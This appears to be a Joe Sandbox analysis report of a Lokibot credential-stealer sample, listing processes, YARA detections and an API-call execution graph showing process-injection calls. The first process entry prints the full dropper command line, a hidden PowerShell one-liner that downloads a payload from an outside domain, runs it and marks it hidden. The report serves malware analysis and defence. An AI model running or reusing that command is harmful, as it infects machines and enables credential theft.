                                                        Click to jump to process

                                                        Click to jump to process

                                                        Click to dive into process behavior distribution

                                                        Click to jump to process

                                                        Target ID:0
                                                        Start time:03:20:36
                                                        Start date:03/10/2024
                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -Command OpenWith.exe;(new-object System.Net.WebClient).DownloadFile('https://www.sodiumlaurethsulfatedesyroyer.com/flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbAFRAWYEGFYAUGEYGywefafaer/nezfdio.pif','mjtjewi.exe');./'mjtjewi.exe';(get-item 'mjtjewi.exe').Attributes += 'Hidden';
                                                        Imagebase:0x7ff6eb350000
                                                        File size:452'608 bytes
                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:2
                                                        Start time:03:20:36
                                                        Start date:03/10/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff68cce0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:3
                                                        Start time:03:20:39
                                                        Start date:03/10/2024
                                                        Path:C:\Windows\System32\OpenWith.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Windows\system32\OpenWith.exe"
                                                        Imagebase:0x7ff64cf40000
                                                        File size:123'984 bytes
                                                        MD5 hash:E4A834784FA08C17D47A1E72429C5109
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:4
                                                        Start time:03:20:45
                                                        Start date:03/10/2024
                                                        Path:C:\Users\user\Desktop\mjtjewi.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\mjtjewi.exe"
                                                        Imagebase:0xb70000
                                                        File size:371'712 bytes
                                                        MD5 hash:DB94D5DF4ADD0A06F261EAE73C2DA5DB
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000004.00000002.1494647068.0000000004A28000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000004.00000002.1494647068.0000000004A28000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.1494647068.0000000004A28000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000004.00000002.1494647068.0000000004A28000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                        • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000004.00000002.1494647068.0000000004A28000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                        • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000004.00000002.1494647068.0000000004A28000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                        • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000004.00000002.1481059801.0000000002FD4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000004.00000002.1481059801.0000000002FD4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.1481059801.0000000002FD4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000004.00000002.1481059801.0000000002FD4000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                        • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000004.00000002.1481059801.0000000002FD4000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                        • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000004.00000002.1481059801.0000000002FD4000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                        • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000004.00000002.1481059801.0000000002FBA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000004.00000002.1481059801.0000000002FBA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.1481059801.0000000002FBA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000004.00000002.1481059801.0000000002FBA000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                        • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000004.00000002.1481059801.0000000002FBA000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                        • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000004.00000002.1481059801.0000000002FBA000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                        • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000004.00000002.1481059801.0000000002F98000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000004.00000002.1481059801.0000000002F98000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.1481059801.0000000002F98000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000004.00000002.1481059801.0000000002F98000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                        • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000004.00000002.1481059801.0000000002F98000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                        • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000004.00000002.1481059801.0000000002F98000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                        Antivirus matches:
                                                        • Detection: 100%, Joe Sandbox ML
                                                        Reputation:low
                                                        Has exited:true

                                                        Target ID:5
                                                        Start time:03:20:46
                                                        Start date:03/10/2024
                                                        Path:C:\Users\user\Desktop\mjtjewi.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Users\user\Desktop\mjtjewi.exe
                                                        Imagebase:0x5e0000
                                                        File size:371'712 bytes
                                                        MD5 hash:DB94D5DF4ADD0A06F261EAE73C2DA5DB
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000005.00000002.2638675432.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:low
                                                        Has exited:false

                                                        Target ID:6
                                                        Start time:03:20:46
                                                        Start date:03/10/2024
                                                        Path:C:\Users\user\Desktop\mjtjewi.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Users\user\Desktop\mjtjewi.exe
                                                        Imagebase:0x7d0000
                                                        File size:371'712 bytes
                                                        MD5 hash:DB94D5DF4ADD0A06F261EAE73C2DA5DB
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000006.00000002.1468614773.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000006.00000002.1468614773.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.1468614773.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000006.00000002.1468614773.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                        • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000006.00000002.1468614773.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                        • Rule: Loki_1, Description: Loki Payload, Source: 00000006.00000002.1468614773.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                                                        • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000006.00000002.1468614773.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                        • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000006.00000002.1468614773.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                        Reputation:low
                                                        Has exited:true

                                                        Target ID:7
                                                        Start time:03:20:46
                                                        Start date:03/10/2024
                                                        Path:C:\Users\user\Desktop\mjtjewi.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Users\user\Desktop\mjtjewi.exe
                                                        Imagebase:0x790000
                                                        File size:371'712 bytes
                                                        MD5 hash:DB94D5DF4ADD0A06F261EAE73C2DA5DB
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:low
                                                        Has exited:true

                                                        Reset < >
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1508795811.00007FFE7DE70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7DE70000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ffe7de70000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                          • Instruction ID: be9635b1fa0346cf1be8f7100ae550e67fd61efe711796e5b232e631baab43a0
                                                          • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                          • Instruction Fuzzy Hash: 6501677111CB0C4FD794EF0CE451AA5B7E0FB95364F10056EE59AC36A1DA36E882CB45
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1509161917.00007FFE7DF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7DF40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ffe7df40000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 13e8f63a1a25da0154e92a7b99c2b540909617016b76997e1fb57db787351310
                                                          • Instruction ID: e10804853914b60bb55ef97f4f85482f2db829bbc2de651322746a00af99acf1
                                                          • Opcode Fuzzy Hash: 13e8f63a1a25da0154e92a7b99c2b540909617016b76997e1fb57db787351310
                                                          • Instruction Fuzzy Hash: 3FF09631B1D5094EF2ADA61CA4452BD73D2EF84325B54457AE01DC27B7DD25A8424601
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1509161917.00007FFE7DF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7DF40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ffe7df40000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8d35321487d1656f6909c40955abb88c8d6177b1727dace5425e62687eb15297
                                                          • Instruction ID: f7e29a86209f022fa08cc1d0e8c108b543f7d43423ab2acf9108dc263d91d767
                                                          • Opcode Fuzzy Hash: 8d35321487d1656f6909c40955abb88c8d6177b1727dace5425e62687eb15297
                                                          • Instruction Fuzzy Hash: C3F06532B2C6198EE77DA728A4450F8B3D1FB45225B54057AE01DD3672EE36A843C644
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1509161917.00007FFE7DF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7DF40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ffe7df40000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 26ab170cc4826846ce44fb0d045ca6d720f230907ab75603e1623e65a318dc8f
                                                          • Instruction ID: 5fd592e3d7c63466a94b65af23ba1e747c0f6732c36e440c1918f9061763570a
                                                          • Opcode Fuzzy Hash: 26ab170cc4826846ce44fb0d045ca6d720f230907ab75603e1623e65a318dc8f
                                                          • Instruction Fuzzy Hash: A7D01720B2AA8A0AF6AEA628102537C50D3EF88251B64803EA04EC27FBDC2898410340
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1509161917.00007FFE7DF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7DF40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ffe7df40000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 95e20a444f661b15dd15d32ff12d479a496e10151ae950e985caf5baf7cf1fc4
                                                          • Instruction ID: 3e2aec1d5a73d0f7e2ce563b2053e056d3d30376fbec430cb9e0972ca6859dd1
                                                          • Opcode Fuzzy Hash: 95e20a444f661b15dd15d32ff12d479a496e10151ae950e985caf5baf7cf1fc4
                                                          • Instruction Fuzzy Hash: 73C01230F25A4D4FD7BAA334001427890D2BF492057504478800EC36F5FD3D9802C340

                                                          Execution Graph

                                                          Execution Coverage:15.8%
                                                          Dynamic/Decrypted Code Coverage:100%
                                                          Signature Coverage:18.3%
                                                          Total number of Nodes:327
                                                          Total number of Limit Nodes:13
                                                          execution_graph 17491 ac90828 17493 ac90844 17491->17493 17492 ac90a1b 17697 af5077c 17492->17697 17702 af5104d 17492->17702 17707 af503e2 17492->17707 17712 af50f08 17492->17712 17720 af50712 17492->17720 17725 af5083b 17492->17725 17731 af50604 17492->17731 17735 af5053f 17492->17735 17741 af506b7 17492->17741 17746 af500fd 17492->17746 17753 af50b7d 17492->17753 17758 af50e24 17492->17758 17763 af50006 17492->17763 17770 af50eb3 17492->17770 17778 af50274 17492->17778 17783 af5065d 17492->17783 17788 af50040 17492->17788 17795 af50955 17492->17795 17493->17492 17537 ac9c99d 17493->17537 17542 ac9c71c 17493->17542 17554 ac9c363 17493->17554 17559 ac9c9f2 17493->17559 17564 ac9c92f 17493->17564 17570 ac9ca95 17493->17570 17575 ac9c00d 17493->17575 17583 ac9c45f 17493->17583 17591 ac9cbae 17493->17591 17599 ac9e081 17493->17599 17608 ac9e8c1 17493->17608 17614 ac9e465 17493->17614 17619 ac9e7c5 17493->17619 17624 ac9ee1b 17493->17624 17629 ac9ec9c 17493->17629 17637 ac9e188 17493->17637 17646 ac9ed5f 17493->17646 17651 ac9ea54 17493->17651 17656 ac9e14d 17493->17656 17665 ac9e1d4 17493->17665 17670 ac9e437 17493->17670 17676 ac9ec8c 17493->17676 17684 ac9e30f 17493->17684 17692 ac9eb21 17493->17692 17494 ac90a5b 17538 ac9c9a9 17537->17538 17800 ac9df28 17538->17800 17804 ac9df21 17538->17804 17539 ac9c9ce 17543 ac9c731 17542->17543 17809 ac9d391 17543->17809 17816 ac9d3a0 17543->17816 17544 ac9c74d 17550 ac9d391 3 API calls 17544->17550 17551 ac9d3a0 3 API calls 17544->17551 17545 ac9c791 17823 ac9dba8 17545->17823 17827 ac9dbb0 17545->17827 17831 ac9db59 17545->17831 17546 ac9c84d 17550->17545 17551->17545 17555 ac9c36d 17554->17555 17557 ac9d391 3 API calls 17555->17557 17558 ac9d3a0 3 API calls 17555->17558 17556 ac9c3bb 17557->17556 17558->17556 17560 ac9c9fe 17559->17560 17844 ac9ddc9 17560->17844 17849 ac9ddd0 17560->17849 17561 ac9ca71 17565 ac9c93b 17564->17565 17567 ac9db59 NtResumeThread 17565->17567 17568 ac9dba8 NtResumeThread 17565->17568 17569 ac9dbb0 NtResumeThread 17565->17569 17566 ac9c979 17567->17566 17568->17566 17569->17566 17571 ac9cab0 17570->17571 17573 ac9df28 NtSetContextThread 17571->17573 17574 ac9df21 NtSetContextThread 17571->17574 17572 ac9cb28 17573->17572 17574->17572 17576 ac9c019 17575->17576 17579 ac9ddc9 NtWriteVirtualMemory 17576->17579 17580 ac9ddd0 NtWriteVirtualMemory 17576->17580 17577 ac9c0b2 17581 ac9d391 3 API calls 17577->17581 17582 ac9d3a0 3 API calls 17577->17582 17578 ac9c100 17579->17577 17580->17577 17581->17578 17582->17578 17584 ac9c46b 17583->17584 17587 ac9d391 3 API calls 17584->17587 17588 ac9d3a0 3 API calls 17584->17588 17585 ac9c4b8 17853 ac9dca8 17585->17853 17857 ac9dcb0 17585->17857 17586 ac9c4f6 17587->17585 17588->17585 17592 ac9cbba 17591->17592 17597 ac9d391 3 API calls 17592->17597 17598 ac9d3a0 3 API calls 17592->17598 17593 ac9cc11 17595 ac9ddc9 NtWriteVirtualMemory 17593->17595 17596 ac9ddd0 NtWriteVirtualMemory 17593->17596 17594 ac9cc4d 17595->17594 17596->17594 17597->17593 17598->17593 17600 ac9e0c4 17599->17600 17606 ac9df28 NtSetContextThread 17600->17606 17607 ac9df21 NtSetContextThread 17600->17607 17601 ac9f01c 17603 ac9db59 NtResumeThread 17601->17603 17604 ac9dba8 NtResumeThread 17601->17604 17605 ac9dbb0 NtResumeThread 17601->17605 17602 ac9f0cf 17602->17493 17603->17602 17604->17602 17605->17602 17606->17601 17607->17601 17609 ac9e8dc 17608->17609 17611 ac9db59 NtResumeThread 17609->17611 17612 ac9dba8 NtResumeThread 17609->17612 17613 ac9dbb0 NtResumeThread 17609->17613 17610 ac9e96e 17611->17610 17612->17610 17613->17610 17615 ac9e471 17614->17615 17617 ac9ddc9 NtWriteVirtualMemory 17615->17617 17618 ac9ddd0 NtWriteVirtualMemory 17615->17618 17616 ac9e4e4 17617->17616 17618->17616 17620 ac9e7cf 17619->17620 17861 ac9f279 17620->17861 17866 ac9f288 17620->17866 17621 ac9e81d 17625 ac9ee27 17624->17625 17627 ac9df28 NtSetContextThread 17625->17627 17628 ac9df21 NtSetContextThread 17625->17628 17626 ac9ee4c 17627->17626 17628->17626 17630 ac9eca8 17629->17630 17635 ac9f279 2 API calls 17630->17635 17636 ac9f288 2 API calls 17630->17636 17631 ac9ecff 17633 ac9ddc9 NtWriteVirtualMemory 17631->17633 17634 ac9ddd0 NtWriteVirtualMemory 17631->17634 17632 ac9ed3b 17633->17632 17634->17632 17635->17631 17636->17631 17638 ac9e119 17637->17638 17644 ac9df28 NtSetContextThread 17638->17644 17645 ac9df21 NtSetContextThread 17638->17645 17639 ac9f01c 17641 ac9db59 NtResumeThread 17639->17641 17642 ac9dba8 NtResumeThread 17639->17642 17643 ac9dbb0 NtResumeThread 17639->17643 17640 ac9f0cf 17640->17493 17641->17640 17642->17640 17643->17640 17644->17639 17645->17639 17647 ac9ed6b 17646->17647 17649 ac9f279 2 API calls 17647->17649 17650 ac9f288 2 API calls 17647->17650 17648 ac9ed87 17649->17648 17650->17648 17652 ac9eaa7 17651->17652 17654 ac9ddc9 NtWriteVirtualMemory 17652->17654 17655 ac9ddd0 NtWriteVirtualMemory 17652->17655 17653 ac9eafd 17654->17653 17655->17653 17657 ac9e119 17656->17657 17663 ac9df28 NtSetContextThread 17657->17663 17664 ac9df21 NtSetContextThread 17657->17664 17658 ac9f01c 17660 ac9db59 NtResumeThread 17658->17660 17661 ac9dba8 NtResumeThread 17658->17661 17662 ac9dbb0 NtResumeThread 17658->17662 17659 ac9f0cf 17659->17493 17660->17659 17661->17659 17662->17659 17663->17658 17664->17658 17666 ac9e1de 17665->17666 17668 ac9f279 2 API calls 17666->17668 17669 ac9f288 2 API calls 17666->17669 17667 ac9e257 17668->17667 17669->17667 17671 ac9e43a 17670->17671 17672 ac9e3f4 17670->17672 17674 ac9dca8 VirtualAllocEx 17672->17674 17675 ac9dcb0 VirtualAllocEx 17672->17675 17673 ac9e408 17674->17673 17675->17673 17677 ac9ec8f 17676->17677 17680 ac9f279 2 API calls 17677->17680 17681 ac9f288 2 API calls 17677->17681 17678 ac9ecff 17682 ac9ddc9 NtWriteVirtualMemory 17678->17682 17683 ac9ddd0 NtWriteVirtualMemory 17678->17683 17679 ac9ed3b 17680->17678 17681->17678 17682->17679 17683->17679 17685 ac9e32a 17684->17685 17688 ac9f279 2 API calls 17685->17688 17689 ac9f288 2 API calls 17685->17689 17686 ac9e3ca 17690 ac9dca8 VirtualAllocEx 17686->17690 17691 ac9dcb0 VirtualAllocEx 17686->17691 17687 ac9e408 17688->17686 17689->17686 17690->17687 17691->17687 17693 ac9eb4c 17692->17693 17695 ac9f279 2 API calls 17693->17695 17696 ac9f288 2 API calls 17693->17696 17694 ac9eb68 17695->17694 17696->17694 17698 af50788 17697->17698 17700 ac9df28 NtSetContextThread 17698->17700 17701 ac9df21 NtSetContextThread 17698->17701 17699 af507ad 17700->17699 17701->17699 17704 af50ff0 17702->17704 17703 af5105e 17704->17702 17704->17703 17705 ac9ddc9 NtWriteVirtualMemory 17704->17705 17706 ac9ddd0 NtWriteVirtualMemory 17704->17706 17705->17704 17706->17704 17708 af5040d 17707->17708 17871 af51231 17708->17871 17876 af51240 17708->17876 17709 af50429 17713 af50f14 17712->17713 17718 af51231 2 API calls 17713->17718 17719 af51240 2 API calls 17713->17719 17714 af50fd0 17715 af5105e 17714->17715 17716 ac9ddc9 NtWriteVirtualMemory 17714->17716 17717 ac9ddd0 NtWriteVirtualMemory 17714->17717 17716->17714 17717->17714 17718->17714 17719->17714 17721 af50727 17720->17721 17723 af51231 2 API calls 17721->17723 17724 af51240 2 API calls 17721->17724 17722 af50743 17723->17722 17724->17722 17726 af50856 17725->17726 17728 ac9db59 NtResumeThread 17726->17728 17729 ac9dba8 NtResumeThread 17726->17729 17730 ac9dbb0 NtResumeThread 17726->17730 17727 af508e7 17728->17727 17729->17727 17730->17727 17733 ac9df28 NtSetContextThread 17731->17733 17734 ac9df21 NtSetContextThread 17731->17734 17732 af50639 17733->17732 17734->17732 17736 af5054b 17735->17736 17738 ac9db59 NtResumeThread 17736->17738 17739 ac9dba8 NtResumeThread 17736->17739 17740 ac9dbb0 NtResumeThread 17736->17740 17737 af5058a 17738->17737 17739->17737 17740->17737 17742 af506bb 17741->17742 17744 af51231 2 API calls 17742->17744 17745 af51240 2 API calls 17742->17745 17743 af50743 17744->17743 17745->17743 17747 af500c9 17746->17747 17747->17746 17748 af500f7 17747->17748 17749 ac9dca8 VirtualAllocEx 17747->17749 17750 ac9dcb0 VirtualAllocEx 17747->17750 17751 af51231 2 API calls 17747->17751 17752 af51240 2 API calls 17747->17752 17748->17494 17749->17747 17750->17747 17751->17747 17752->17747 17754 af50b99 17753->17754 17756 ac9ddc9 NtWriteVirtualMemory 17754->17756 17757 ac9ddd0 NtWriteVirtualMemory 17754->17757 17755 af50c21 17756->17755 17757->17755 17759 af50e2e 17758->17759 17881 ac9cd8e 17759->17881 17885 ac9cdc0 17759->17885 17764 af50040 17763->17764 17765 af500f7 17764->17765 17766 af51231 2 API calls 17764->17766 17767 af51240 2 API calls 17764->17767 17768 ac9dca8 VirtualAllocEx 17764->17768 17769 ac9dcb0 VirtualAllocEx 17764->17769 17765->17494 17766->17764 17767->17764 17768->17764 17769->17764 17771 af50eb6 17770->17771 17776 af51231 2 API calls 17771->17776 17777 af51240 2 API calls 17771->17777 17772 af50fd0 17773 af5105e 17772->17773 17774 ac9ddc9 NtWriteVirtualMemory 17772->17774 17775 ac9ddd0 NtWriteVirtualMemory 17772->17775 17774->17772 17775->17772 17776->17772 17777->17772 17779 af5027e 17778->17779 17781 af51231 2 API calls 17779->17781 17782 af51240 2 API calls 17779->17782 17780 af502cc 17781->17780 17782->17780 17784 af50669 17783->17784 17786 af51231 2 API calls 17784->17786 17787 af51240 2 API calls 17784->17787 17785 af50685 17786->17785 17787->17785 17790 af50074 17788->17790 17789 af500f7 17789->17494 17790->17789 17791 af51231 2 API calls 17790->17791 17792 af51240 2 API calls 17790->17792 17793 ac9dca8 VirtualAllocEx 17790->17793 17794 ac9dcb0 VirtualAllocEx 17790->17794 17791->17790 17792->17790 17793->17790 17794->17790 17796 af5098a 17795->17796 17798 ac9ddc9 NtWriteVirtualMemory 17796->17798 17799 ac9ddd0 NtWriteVirtualMemory 17796->17799 17797 af509fd 17798->17797 17799->17797 17801 ac9df71 NtSetContextThread 17800->17801 17803 ac9dfe9 17801->17803 17803->17539 17805 ac9deea 17804->17805 17806 ac9df26 NtSetContextThread 17804->17806 17805->17539 17808 ac9dfe9 17806->17808 17808->17539 17810 ac9d3a0 17809->17810 17815 ac9db59 NtResumeThread 17810->17815 17811 ac9d43d 17836 ac9d9f8 17811->17836 17840 ac9d9f0 17811->17840 17812 ac9d4a2 17812->17544 17815->17811 17817 ac9d3c4 17816->17817 17822 ac9db59 NtResumeThread 17817->17822 17818 ac9d43d 17820 ac9d9f8 NtReadVirtualMemory 17818->17820 17821 ac9d9f0 NtReadVirtualMemory 17818->17821 17819 ac9d4a2 17819->17544 17820->17819 17821->17819 17822->17818 17824 ac9dbb0 NtResumeThread 17823->17824 17826 ac9dc4b 17824->17826 17826->17546 17828 ac9dbf4 NtResumeThread 17827->17828 17830 ac9dc4b 17828->17830 17830->17546 17832 ac9db62 17831->17832 17833 ac9db7e 17832->17833 17834 ac9dc15 NtResumeThread 17832->17834 17833->17546 17835 ac9dc4b 17834->17835 17835->17546 17837 ac9da44 NtReadVirtualMemory 17836->17837 17839 ac9dabc 17837->17839 17839->17812 17841 ac9d9f8 NtReadVirtualMemory 17840->17841 17843 ac9dabc 17841->17843 17843->17812 17845 ac9dd91 17844->17845 17846 ac9ddce NtWriteVirtualMemory 17844->17846 17845->17561 17848 ac9deb2 17846->17848 17848->17561 17850 ac9de19 NtWriteVirtualMemory 17849->17850 17852 ac9deb2 17850->17852 17852->17561 17854 ac9dcb0 VirtualAllocEx 17853->17854 17856 ac9dd6c 17854->17856 17856->17586 17858 ac9dcf4 VirtualAllocEx 17857->17858 17860 ac9dd6c 17858->17860 17860->17586 17863 ac9f288 17861->17863 17862 ac9f2f2 17862->17621 17863->17862 17864 ac9d9f8 NtReadVirtualMemory 17863->17864 17865 ac9d9f0 NtReadVirtualMemory 17863->17865 17864->17863 17865->17863 17868 ac9f2ac 17866->17868 17867 ac9f2f2 17867->17621 17868->17867 17869 ac9d9f8 NtReadVirtualMemory 17868->17869 17870 ac9d9f0 NtReadVirtualMemory 17868->17870 17869->17868 17870->17868 17873 af51240 17871->17873 17872 af512aa 17872->17709 17873->17872 17874 ac9d9f8 NtReadVirtualMemory 17873->17874 17875 ac9d9f0 NtReadVirtualMemory 17873->17875 17874->17873 17875->17873 17878 af51264 17876->17878 17877 af512aa 17877->17709 17878->17877 17879 ac9d9f8 NtReadVirtualMemory 17878->17879 17880 ac9d9f0 NtReadVirtualMemory 17878->17880 17879->17878 17880->17878 17882 ac9cdc0 CreateProcessW 17881->17882 17884 ac9d224 17882->17884 17887 ac9ce50 CreateProcessW 17885->17887 17888 ac9d224 17887->17888 17889 15217d0 17890 152181d VirtualProtect 17889->17890 17891 1521889 17890->17891

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
